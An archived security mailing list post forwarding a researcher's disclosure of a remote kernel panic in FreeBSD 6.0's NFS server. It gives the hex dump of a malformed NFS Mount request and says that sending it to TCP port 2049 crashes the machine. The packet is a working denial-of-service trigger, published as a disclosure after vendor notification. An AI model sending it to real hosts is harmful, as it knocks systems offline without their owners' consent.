Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] FreeBSD NFS vulnerability
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Sun, 26 Feb 2006 19:10:42 +0300 (MSK)
> From: Evgeny Legerov <admin@xxxxxxxx>
> Subject: [Dailydave] fun with FreeBSD kernel
> To: dailydave@xxxxxxxxxxxxxxxxxxxxx
> Message-ID: <20060226161042.16A5D23E4D5@xxxxxxxxxxxxxxx>
>
> Hi,
>
> ProtoVer NFS testsuite 1.0 uncovered remote kernel panic
> vulnerability in FreeBSD 6.0 kernel.
>
> The hex dump of NFS Mount request:
> """
> 80 00 00 00 00 00 00 01 00 00 00 00 00 00 00 02
> 00 01 86 a5 00 00 00 01 00 00 00 01 00 00 00 00
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04
> 2f 74 6d 70
> """
>
> To trigger the bug, send the above request to 2049 TCP port
> of a FreeBSD machine running nfsd.
>
> FreeBSD team has been notified more than two weeks ago.
>
> Regards,
> Evgeny Legerov
> www.gleg.net
>
>
> ------------------------------
>
> _______________________________________________
> Dailydave mailing list
> Dailydave@xxxxxxxxxxxxxxxxxxxxx
>
>
>
> End of Dailydave Digest, Vol 7, Issue 27
> ****************************************
>
|
